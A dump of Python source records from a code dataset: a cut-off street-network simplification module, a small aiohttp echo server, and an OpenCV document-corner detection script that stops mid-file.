cluster\n nodes_traversed = [item for items in list_nodes_traversed for item in items if item is not None]\n lines_traversed = [item for items in list_lines_traversed for item in items if item is not None]\n clusters_traversed = [item for items in list_clusters_traversed for item in items if item is not None]\n \n if len(possible_dual_lines) == 2:\n common = list(set(list_lines_traversed[0]).intersection(list_lines_traversed[1]))\n if len(common) > 0:\n continue\n else: \n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node, \n nodes_traversed, drs[0], clusters_traversed = clusters_traversed)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node,\n nodes_traversed, drs[0], clusters_traversed = clusters_traversed)\n if merged is None:\n continue\n \n done = True\n # print('OPTION 2 - COMPLETED')\n\n if not done: \n pass \n else: \n clusters = [cluster, goal]\n between = (\n list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_u.isin(clusters)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_v.isin(clusters)) & (original_edges_gdf.u.isin(nodes_traversed))])+ \n list(original_edges_gdf.index[(original_edges_gdf.clus_uR.isin(clusters)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_vR.isin(clusters)) & (original_edges_gdf.u.isin(nodes_traversed))]))\n \n\n between = list(set(between + lines_traversed + ix_lines)) \n to_drop = to_drop + between\n to_drop = list(filter(lambda a: a != ix_lines[0], to_drop)) \n processed = processed + [ix_lines[0]] + to_drop\n clusters_gdf.at[clusters, 'keep'] = True\n if len(original_edges_gdf.loc[processed][original_edges_gdf.pedestrian == 1]) > 0: \n edges_gdf.at[ix_lines[0], 'pedestrian'] = 1\n\n edges_gdf.drop(to_drop, axis = 0, inplace = True, errors = 'ignore')\n edges_gdf['edgeID'] = edges_gdf.index.values.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.index.values.astype(int)\n 
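# --- Illustrative sketch, not part of the original module ---
# The pruning loops above discard candidate paths whose traversed-edge lists
# overlap, so each street segment is merged at most once. The same check in
# isolation (data is made up):
paths = {
    "A": [3, 4, 5],
    "B": [5, 6],     # shares edge 5 with A -> dropped
    "C": [7, 8],
}
kept = []
for name, edge_ids in paths.items():
    if any(set(edge_ids) & set(other) for other in kept):
        continue
    kept.append(edge_ids)
# kept == [[3, 4, 5], [7, 8]]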
nodes_gdf, edges_gdf = reassign_edges(nodes_gdf, edges_gdf, clusters_gdf) \n return(nodes_gdf, edges_gdf, clusters_gdf) \n\n\ndef simplify_dual_lines_nodes_to_cluster(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.index, edges_gdf.index, clusters_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID, clusters_gdf.clusterID\n nodes_gdf.index.name, edges_gdf.index.name, clusters_gdf.index.name = None, None, None\n nodes_gdf, edges_gdf, clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n\n processed = []\n print('Simplifying dual lines: Second part - nodes')\n edges_gdf = _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf)\n\n original_edges_gdf = edges_gdf.copy()\n original_nodes_gdf = nodes_gdf.copy()\n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n clusters_gdf['keep'] = False\n edges_gdf['new_geo'] = False\n to_drop = []\n \n for node in nodes_gdf.itertuples():\n tmp = original_edges_gdf[((original_edges_gdf.u == node[0]) | (original_edges_gdf.v == node[0]))].copy()\n \n for road in tmp.itertuples():\n if road.Index in processed: \n continue \n if road[ix_u] == node[0]:\n goal = road[ix_clus_v]\n if goal is None: \n goal = road[ix_clus_vR]\n elif road[ix_v] == node[0]:\n goal = road[ix_clus_u]\n if goal is None: \n goal = road[ix_clus_uR]\n if goal is None: \n continue\n \n possible_dual_lines = tmp[(tmp.clus_u == goal) | (tmp.clus_uR == goal) | (tmp.clus_v == goal) | (tmp.clus_vR == goal)].copy()\n possible_dual_lines['dir'] = 'v'\n for candidate in possible_dual_lines.itertuples():\n if candidate[ix_v] == node[0]:\n line_coords = list(candidate[ix_geo].coords)\n line_coords.reverse() \n new_line_geometry = LineString([coor for coor in line_coords])\n old_u, old_clus_u, old_clus_uR = candidate[ix_u], candidate[ix_clus_u], candidate[ix_clus_uR]\n possible_dual_lines.at[candidate[0],'geometry'] = new_line_geometry\n possible_dual_lines.at[candidate[0],'u'] = candidate[ix_v]\n possible_dual_lines.at[candidate[0],'v'] = old_u\n possible_dual_lines.at[candidate[0],'clus_u'] = candidate[ix_clus_v]\n possible_dual_lines.at[candidate[0],'clus_v'] = old_clus_u\n possible_dual_lines.at[candidate[0],'clus_uR'] = candidate[ix_clus_vR]\n possible_dual_lines.at[candidate[0],'clus_vR'] = old_clus_uR\n possible_dual_lines.at[candidate[0], 'dir'] = 'u' # indicates original dir\n \n possible_dual_lines = possible_dual_lines[(possible_dual_lines.clus_v == goal) | (possible_dual_lines.clus_vR == goal)].copy()\n\n done = False\n if len(possible_dual_lines) == 1: \n continue # no parallel streets to road.Index \n \n c_u = [possible_dual_lines.iloc[i]['clus_u'] for i in range(0, len(possible_dual_lines))]\n c_v = [possible_dual_lines.iloc[i]['clus_v'] for i in range(0, len(possible_dual_lines))]\n u = [possible_dual_lines.iloc[i]['u'] for i in range(0, len(possible_dual_lines))] \n v = [possible_dual_lines.iloc[i]['v'] for i in range(0, len(possible_dual_lines))] \n drs = [possible_dual_lines.iloc[i]['dir'] for i in range(0, len(possible_dual_lines))] \n line_geometries = [possible_dual_lines.iloc[i]['geometry'] for i in range(0, len(possible_dual_lines))] \n ix_lines = 
[possible_dual_lines.iloc[i].edgeID for i in range(0, len(possible_dual_lines))] \n list_nodes_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_lines_traversed = [[] for i in range(0, len(possible_dual_lines))] \n last_node, nodes_traversed, lines_traversed = None, [], [] \n \n ######################################################## OPTION 1\n if all(x == c_v[0] for x in c_v) & (not None in c_v):\n \n if len(possible_dual_lines) == 2:\n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node,\n nodes_traversed, drs[0], one_cluster = True)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], \n last_node, nodes_traversed, drs[0], one_cluster = True)\n if merged is None: \n # print('OPTION 1 -- NOT COMPLETED after having attempted to dissolve')\n continue \n\n done = True\n between = (list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & \n (original_edges_gdf.v.isin(nodes_traversed))])) \n \n ######################################################## OPTION 2\n elif None in c_v:\n\n for n, c in enumerate(c_v):\n if c is None:\n _, line_geometries[n], list_lines_traversed[n], list_nodes_traversed[n], last_node,_ = indirect_cluster(\n original_nodes_gdf, original_edges_gdf, clusters_gdf, ix_lines[n], drs[n])\n \n nodes_traversed = [item for items in list_nodes_traversed for item in items if item is not None]\n lines_traversed = [item for items in list_lines_traversed for item in items if item is not None]\n if len(possible_dual_lines) == 2:\n common = list(set(list_lines_traversed[0]).intersection(list_lines_traversed[1]))\n if len(common) > 0:\n continue\n else: \n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node, \n nodes_traversed, drs[0], one_cluster = True)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node,\n nodes_traversed, drs[0], one_cluster = True)\n if merged is None:\n continue \n \n done = True\n between = (list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & \n (original_edges_gdf.v.isin(nodes_traversed))]))\n \n if not done: \n continue\n to_drop = to_drop + lines_traversed + ix_lines + between\n to_drop = list(filter(lambda a: a != ix_lines[0], to_drop))\n processed = processed + [ix_lines[0]] + to_drop + lines_traversed + between \n clusters_gdf.at[goal, 'keep'] = True\n if len(original_edges_gdf.loc[processed][original_edges_gdf.pedestrian == 1]) > 0:\n edges_gdf.at[ix_lines[0], 'pedestrian'] = 1\n\n edges_gdf.drop(to_drop, axis = 0, inplace = True, errors = 'ignore')\n nodes_gdf, edges_gdf = reassign_edges(nodes_gdf, edges_gdf, clusters_gdf) \n edges_gdf['edgeID'] = edges_gdf.index.values.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.index.values.astype(int)\n nodes_gdf.drop(['cluster'], axis = 1, inplace = True)\n return(nodes_gdf, edges_gdf)\n\ndef reassign_edges(nodes_gdf, edges_gdf, clusters_gdf):\n \n print(\"Assigning centroids coordinates\")\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n edges_gdf = edges_gdf.rename(columns = {'u':'old_u', 'v':'old_v'})\n \n edges_gdf['u'], edges_gdf['v'] = 0, 0\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1 \n ix_old_u, ix_old_v = edges_gdf.columns.get_loc(\"old_u\")+1, edges_gdf.columns.get_loc(\"old_v\")+1 \n ix_geo = 
edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_changed = edges_gdf.columns.get_loc(\"new_geo\")+1 \n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1 \n ix_x, ix_y = clusters_gdf.columns.get_loc(\"x\")+1, clusters_gdf.columns.get_loc(\"y\")+1\n ix_centroid = clusters_gdf.columns.get_loc(\"geometry\")+1\n ix_check = clusters_gdf.columns.get_loc(\"keep\")+1\n \n for row in edges_gdf.itertuples():\n \n line_coords = list(row[ix_geo].coords)\n u = nodes_gdf.loc[row[ix_old_u]][\"cluster\"]\n v = nodes_gdf.loc[row[ix_old_v]][\"cluster\"]\n old_u = row[ix_old_u]\n old_v = row[ix_old_v]\n new_geo = row[ix_changed]\n \n if (u is not None) & (v is not None): # change starting and ending node in the list of coordinates for the line\n if (not clusters_gdf.loc[u].keep) & (not clusters_gdf.loc[v].keep): \n u = old_u\n v = old_v\n elif not clusters_gdf.loc[v].keep:\n v = old_v\n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n # if not new_geo: line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n elif not clusters_gdf.loc[u].keep:\n u = old_u \n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo: line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n else:\n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo:\n # line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n # line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n\n elif (u is None) & (v is None): # maintain old_u and old_v\n u = old_u\n v = old_v\n elif (u is None) & (v is not None): # maintain old_u\n u = old_u\n if not clusters_gdf.loc[v].keep: \n v = old_v\n else: \n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo: line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n elif (u is not None) & (v is None): # maintain old_v\n v = old_v\n if not clusters_gdf.loc[u].keep: \n u = old_u\n else: \n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n # if not new_geo: line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n \n line_geometry = (LineString([coor for coor in line_coords]))\n if u == v: \n edges_gdf.drop(row.Index, axis = 0, inplace = True)\n continue\n \n edges_gdf.at[row.Index,\"u\"] = u\n edges_gdf.at[row.Index,\"v\"] = v\n edges_gdf.at[row.Index,\"geometry\"] = line_geometry\n\n edges_gdf.drop(['old_u', 'old_v'], axis = 1, inplace=True)\n edges_gdf['u'] = edges_gdf['u'].astype(int)\n edges_gdf['v'] = edges_gdf['v'].astype(int)\n nodes_gdf['x'] = nodes_gdf['x'].astype(float)\n nodes_gdf['y'] = nodes_gdf['y'].astype(float)\n \n for cluster in clusters_gdf.itertuples():\n if not cluster[ix_check]:\n continue\n \n nodes_gdf.at[cluster.Index, 'x'] = cluster[ix_x]\n nodes_gdf.at[cluster.Index, 'y'] = cluster[ix_y]\n nodes_gdf.at[cluster.Index, 'geometry'] = cluster[ix_centroid]\n nodes_gdf.at[cluster.Index, 'nodeID'] = cluster.Index\n nodes_gdf.at[cluster.Index, 'cluster'] = None\n \n clusters_gdf.index = clusters_gdf.clusterID.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.nodeID.astype(int)\n nodes_gdf.index = nodes_gdf.nodeID\n nodes_gdf.index.name = None\n edges_gdf.drop(['clus_u','clus_v', 'clus_uR', 'clus_vR', 'new_geo', 'forced_cluster'], axis = 1, errors = 'ignore', inplace = True)\n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = 
clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True)\n return(nodes_gdf, edges_gdf)\n \ndef simplify_pipeline(nodes_gdf, edges_gdf, radius = 12):\n \n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, remove_disconnected_islands = True, same_uv_edges = True, dead_ends = True,\n self_loops = True)\n nodes_gdf, edges_gdf = simplify_dual_lines_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = simplify_complex_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = dissolve_roundabouts(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf, clusters_gdf = identify_clusters(nodes_gdf, edges_gdf, radius = radius)\n nodes_gdf, edges_gdf, clusters_gdf = simplify_dual_lines(nodes_gdf, edges_gdf, clusters_gdf)\n nodes_gdf, edges_gdf = simplify_dual_lines_nodes_to_cluster(nodes_gdf, edges_gdf, clusters_gdf)\n nodes_gdf, edges_gdf = simplify_dual_lines_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = simplify_complex_junctions(nodes_gdf, edges_gdf)\n \n return nodes_gdf, edges_gdf\n \n \n\n \n \n \n \n \n \n \n \n","sub_path":"cityImage/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":78818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566074245","text":"import asyncio\nimport random\n\nfrom aiohttp import web\n\n\nasync def echo_name(request):\n await asyncio.sleep(random.randint(0, 5))\n name = request.match_info.get(\"name\", \"Anonymous\")\n return web.json_response({\"hi\": name})\n\n\nasync def index(request):\n await asyncio.sleep(random.randint(0, 5))\n return web.json_response({\"index\": \"page\"})\n\n\napp = web.Application()\napp.add_routes([\n web.get(\"/\", index),\n web.get(\"/{name}\", echo_name)\n])\n\nif __name__ == \"__main__\":\n web.run_app(app, host=\"0.0.0.0\")\n","sub_path":"python/asyncio_study/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648950195","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\nfrom utils.lib import functlib\r\n\r\nfrom math import pi\r\nfrom math import fabs\r\nfrom math import atan2\r\nfrom math import ceil\r\n\r\n###################################################################################################\r\ndef reduce_noise_forBinaryImage(imageBinary,rm_w=100,isWidth = True):\r\n\r\n num_labels,labels,stats,centroids = cv2.connectedComponentsWithStats(imageBinary, 4, cv2.CV_32S)\r\n \r\n mask = np.ones_like(labels)\r\n\r\n labels_in_mask = list(np.arange(1,num_labels))\r\n\r\n if isWidth:\r\n k = 2\r\n else:\r\n k = 3\r\n\r\n widths = [s[k] for s in stats] #get width\r\n\r\n sorted_idx = np.argsort(widths)\r\n\r\n widths_final = [widths[s] for s in sorted_idx][:-1]\r\n \r\n for lidx, cc in zip(sorted_idx, widths_final):\r\n if cc <= rm_w:\r\n mask[labels == lidx] = 0\r\n labels_in_mask.remove(lidx)\r\n\r\n #decomment this line if wrong accuracy\r\n imageBinary[mask==0]=0\r\n\r\n #processed_area = 255 - processed_area\r\n return imageBinary\r\n# end function\r\n\r\ndef FindFourPointUsingHoughLines(edged):\r\n ## four points from borders of image\r\n LeftTop = [0, 0];\r\n RightTop = [edged.shape[1], 0];\r\n RightBot = [edged.shape[1], edged.shape[0]];\r\n LeftBot = [0,edged.shape[0]];\r\n FourBorder=[LeftTop,RightTop,RightBot,LeftBot]; ##1.tl 2.tr 3.br 
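# --- Illustrative sketch, not part of the original files ---
# The aiohttp service in server.py above exposes "/" and "/{name}", each
# sleeping 0-5 seconds before answering with JSON. Because the handlers are
# coroutines, a client can issue both requests concurrently and wait roughly
# max(delays) rather than their sum. A minimal client, assuming the server
# runs on aiohttp's default port 8080:
import asyncio
import aiohttp

async def fetch(session, path):
    async with session.get(f"http://localhost:8080{path}") as resp:
        return await resp.json()

async def main():
    async with aiohttp.ClientSession() as session:
        results = await asyncio.gather(fetch(session, "/"),
                                       fetch(session, "/bob"))
        print(results)  # e.g. [{'index': 'page'}, {'hi': 'bob'}]

# asyncio.run(main())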
4.bl\r\n #print(\"k1 point\",FourBorder)\r\n\r\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))\r\n\r\n dilated = cv2.morphologyEx(edged, cv2.MORPH_DILATE, kernel)\r\n\r\n ##find hough lines from edge image\r\n #nlinesP = cv2.HoughLinesP(dilated, 1, np.pi/180, 80, minLineLength=20, maxLineGap=1)\r\n\r\n nlinesP=cv2.HoughLinesP(dilated, 1, np.pi / 180, 80,100, 20,) ## runs the actual detection\r\n\r\n cdst = cv2.cvtColor(edged,cv2.COLOR_GRAY2BGR)\r\n #print(nlinesP)\r\n for l in nlinesP:\r\n cv2.line(cdst,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,0,255),2)\r\n cv2.imshow('cdst',cdst)\r\n cv2.waitKey(0)\r\n\r\n\r\n\r\n if (nlinesP is None or len(nlinesP) == 1): ## no lines or one line\r\n print(\"no line\")\r\n ## can not find documents, get border of image\r\n border = 10;\r\n extLeftTop = extRightTop = extLeftBot = extRightBot =[None]*2\r\n\r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border\r\n return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n else:\r\n #### have at least 2 lines\r\n ## find intesection points between lines\r\n ##check case many lines\r\n\r\n IntersectPoints = []\r\n if (len(nlinesP) > 30):\r\n \r\n print('small hough line group') \r\n\r\n SmallnlinesP=functlib.getsmallsetLines(edged, nlinesP) ## remove unwanted lines\r\n\r\n # print small set line\r\n temp_img = cv2.cvtColor(edged,cv2.COLOR_GRAY2BGR)\r\n\r\n for l in SmallnlinesP:\r\n cv2.line(temp_img,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,0,255),2)\r\n cv2.imshow('nncdst',temp_img)\r\n cv2.waitKey(0)\r\n\r\n if (len(SmallnlinesP)==0):\r\n \r\n # print('no small line')\r\n # ## can not find documents, get border of image\r\n # border = 10;\r\n # extLeftTop = extRightTop = extLeftBot = extRightBot =[None]*2\r\n\r\n # extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border\r\n # extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border\r\n # extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border\r\n # extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border\r\n # return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n IntersectPoints = functlib.FindPointIntersection(edged, nlinesP)\r\n \r\n else:\r\n IntersectPoints = functlib.FindPointIntersection(edged, SmallnlinesP)\r\n else:\r\n IntersectPoints = functlib.FindPointIntersection(edged, nlinesP)\r\n\r\n \r\n\r\n IntersectPoints = functlib.posprocess_IntersectionPoint(edged,IntersectPoints)\r\n \r\n for p in IntersectPoints:\r\n cv2.circle(edged, tuple(p), 5, (255, 50, 255), -1)\r\n\r\n cv2.imshow('point',edged)\r\n cv2.waitKey(0)\r\n\r\n if len(IntersectPoints)<4:#less than 4 Point\r\n print(\"less than 4 Point\")\r\n ## first set points to border points of image\r\n\r\n border = 10;\r\n extLeftTop = [border,border]\r\n extRightTop = [edged.shape[1]-border, border]\r\n extRightBot = [edged.shape[1]-border, edged.shape[0]-border];\r\n extLeftBot = [border,edged.shape[0]-border]\r\n ##update new corner points \r\n t1=[];\r\n indexP=0; ##0-tl 1-tr 3-br 3-bl\r\n id_closet=0;\r\n mindist = 0;\r\n maxdist_0 = maxdist_1 = maxdist_2 = maxdist_3 = 99999999\r\n\r\n for i in range(len(IntersectPoints)):\r\n \r\n ##update corner points of documents\r\n t1,indexP,mindist= functlib.Distance_ReferencePoint(IntersectPoints[i], 
FourBorder);\r\n\r\n if (indexP == 0): ##top left point\r\n\r\n if (mindist <= maxdist_0):\r\n \r\n maxdist_0 = mindist;\r\n extLeftTop = IntersectPoints[i];\r\n \r\n elif (indexP == 1): ## top right point\r\n \r\n if (mindist <= maxdist_1):\r\n \r\n maxdist_1 = mindist;\r\n extRightTop = IntersectPoints[i]; \r\n \r\n elif (indexP == 2): ## bottom right\r\n \r\n if (mindist <= maxdist_2):\r\n \r\n maxdist_2 = mindist;\r\n extRightBot = IntersectPoints[i];\r\n \r\n else: ## bottom left\r\n if (mindist <= maxdist_3):\r\n \r\n maxdist_3 = mindist;\r\n extLeftBot = IntersectPoints[i];\r\n \r\n return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n else:\r\n print(\"greater than 4 Point\")\r\n ## >= 4 points , find possible quadrilateral and get largest area\r\n\r\n print(IntersectPoints)\r\n Qual = functlib.FindQual(edged, IntersectPoints)\r\n if (Qual):\r\n max_area = id_x = 0\r\n for i,x in enumerate(Qual):\r\n if(max_area= img.shape[1]*0.4 and w >= img.shape[1]*0.4:\r\n # print(\"YES\")\r\n \r\n # cv2.rectangle(roi_copy, (x, y), (x+w, y+h), (0, 255, 0), 3);\r\n # print(approx)\r\n # cv2.imshow(\"contour\", roi_copy);\r\n # cv2.waitKey(0);\r\n\r\n approx = sorted(approx, key = cv2.contourArea, reverse = True)[:5]\r\n roi_copy = img.copy()\r\n\r\n cv2.drawContours(roi_copy, [approx[0]], -1, 255, -1)\r\n #draw contour\r\n cv2.imshow(\"contour\", roi_copy);\r\n cv2.waitKey(0);\r\n\r\n # sai cho nay\r\n hull = []\r\n Group_FourCornerDoc = []\r\n hull_4vertice = 0\r\n appr_size = len(approx)\r\n\r\n #convex hull\r\n for i in range(0,appr_size):\r\n Area_approx = cv2.contourArea(approx[i])\r\n Area_image = img.shape[1] * img.shape[0]\r\n\r\n if (Area_approx > Area_image*0.1):\r\n CHtemp = cv2.convexHull(approx[i])\r\n Area_hull = np.abs(cv2.contourArea(CHtemp))\r\n if len(CHtemp)<=8 and len(CHtemp)>=4\\\r\n and Area_hull > Area_image * 0.15 \\\r\n and Area_hull / Area_image < 0.9:\r\n #if convex hull has exactly 4 edges ... check angles and length\r\n if len(CHtemp) == 4:\r\n print(\"CHTemp\")\r\n #sort by order 0.top left 1. top rigth 2. bottom right 3. 
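# --- Illustrative sketch, not part of the original module ---
# functlib.orderPoints (used throughout this file) is not shown in this dump;
# a common way to sort four corners into top-left, top-right, bottom-right,
# bottom-left order uses the coordinate sums and differences. This is a sketch
# of that standard trick, not necessarily the repo's own implementation:
import numpy as np

def sketch_order_points(pts):
    pts = np.asarray(pts, dtype="float32")
    ordered = np.zeros((4, 2), dtype="float32")
    s = pts.sum(axis=1)             # x + y
    d = np.diff(pts, axis=1)        # y - x
    ordered[0] = pts[np.argmin(s)]  # top-left: smallest x + y
    ordered[2] = pts[np.argmax(s)]  # bottom-right: largest x + y
    ordered[1] = pts[np.argmin(d)]  # top-right: smallest y - x
    ordered[3] = pts[np.argmax(d)]  # bottom-left: largest y - x
    return ordered

# sketch_order_points([(9, 8), (1, 0), (0, 9), (10, 1)])
# -> [[1, 0], [10, 1], [9, 8], [0, 9]]  (tl, tr, br, bl)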
bottom left\r\n hull_4edges = functlib.orderPoints(CHtemp.tolist())\r\n\r\n hull_4edges_angles = functlib.FindAngleFromRect(hull_4edges)\r\n hull_4edges_length = functlib.FindLengthFromRect(hull_4edges)\r\n \r\n h_angle_min = 70;\r\n h_angle_max = 110;\r\n h_minedge = min(hull_4edges_length[0], hull_4edges_length[1],hull_4edges_length[2], hull_4edges_length[3])\r\n h_maxedge = max(hull_4edges_length[0],hull_4edges_length[1], hull_4edges_length[2], hull_4edges_length[3])\r\n if (h_minedge / h_maxedge > 0.45 and h_minedge / h_maxedge < 0.8 #0.45 0.8\r\n and hull_4edges_angles[0] > h_angle_min and hull_4edges_angles[0] < h_angle_max \r\n and hull_4edges_angles[1] > h_angle_min and hull_4edges_angles[1] < h_angle_max \r\n and hull_4edges_angles[2] > h_angle_min and hull_4edges_angles[2] < h_angle_max \r\n and hull_4edges_angles[3] > h_angle_min and hull_4edges_angles[3] < h_angle_max):\r\n \r\n # set flag is 1\r\n hull_4vertice = 1;\r\n hull.append(hull_4edges) #dont find rotated rectangle for that hull\r\n continue\r\n \r\n #### find rotated rectangle of convex hull (number of edgeds > 4)\r\n TempRect = cv2.minAreaRect(approx[i]);\r\n rectsize = len(TempRect)\r\n rect_points = cv2.boxPoints(TempRect); # get 4 points from rotated rect\r\n \r\n xrank = np.argsort(rect_points[:, 0])\r\n\r\n left = rect_points[xrank[:2], :]\r\n yrank = np.argsort(left[:, 1])\r\n left = left[yrank, :]\r\n\r\n right = rect_points[xrank[2:], :]\r\n yrank = np.argsort(right[:, 1])\r\n right = right[yrank, :]\r\n\r\n # top-left, top-right, bottom-right, bottom-left\r\n box_coords = tuple(left[0]), tuple(right[0]), tuple(right[1]), tuple(left[1])\r\n box_height = functlib._distance(left[0],left[1])\r\n box_width = functlib._distance(left[0],right[0])\r\n\r\n ratio_m = min(box_height, box_width) / max(box_height, box_width)\r\n \r\n if (ratio_m > 0.45 and ratio_m < 0.8\r\n and left[0][0] > 0 and left[0][1] < img.shape[0] \r\n and right[0][0]>0 and right[0][1] > 0 \r\n and right[1][0] < img.shape[1] and right[1][1]>0 \r\n and left[1][0] < img.shape[1] and left[1][1] < img.shape[0]):\r\n\r\n RRectPoint=[rect_points[0],rect_points[1],rect_points[2],rect_points[3]]\r\n orderRRect = functlib.orderPoints(RRectPoint)\r\n Group_FourCornerDoc.append(orderRRect)\r\n ###delete if coordinate value of points is negative and ratio between heigh and width\r\n #sort hull with 4 edges on their areas, the first is the largest one\r\n \r\n hull = np.array(hull).astype(np.int32)\r\n hull = sorted(hull, key = lambda x: np.abs(cv2.contourArea(x)),reverse=False)\r\n #sort rotated rectangle based on their area, the first is the largest one\r\n Group_FourCornerDoc = np.array(Group_FourCornerDoc).astype(np.int32)\r\n\r\n Group_FourCornerDoc = sorted(Group_FourCornerDoc,key = lambda x: np.abs(cv2.contourArea(x)),reverse=True)\r\n\r\n\r\n\r\n convexHull_mask = np.zeros_like(img)\r\n\r\n for i in range(0,len(hull)):\r\n cv2.drawContours(convexHull_mask,hull,i, (255,255,255), 3)\r\n print(\"area of convex hull :\" ,np.abs(cv2.contourArea(hull[i])))\r\n\r\n cv2.imshow(\"convexHull_mask\", convexHull_mask);\r\n cv2.waitKey(0);\r\n\r\n\r\n convexHull_mask2 = np.zeros_like(img)\r\n\r\n for i in range(0,len(Group_FourCornerDoc)):\r\n cv2.drawContours(convexHull_mask2,Group_FourCornerDoc,i, (255,255,255), 3)\r\n\r\n cv2.imshow(\"rotated retangle\", convexHull_mask2);\r\n cv2.waitKey(0);\r\n\r\n extLeftTop, extRightTop, extLeftBot, extRightBot = None,None,None,None\r\n\r\n if (len(Group_FourCornerDoc)==0 and len(hull)==0):\r\n print(\"case 1: no enclosed 
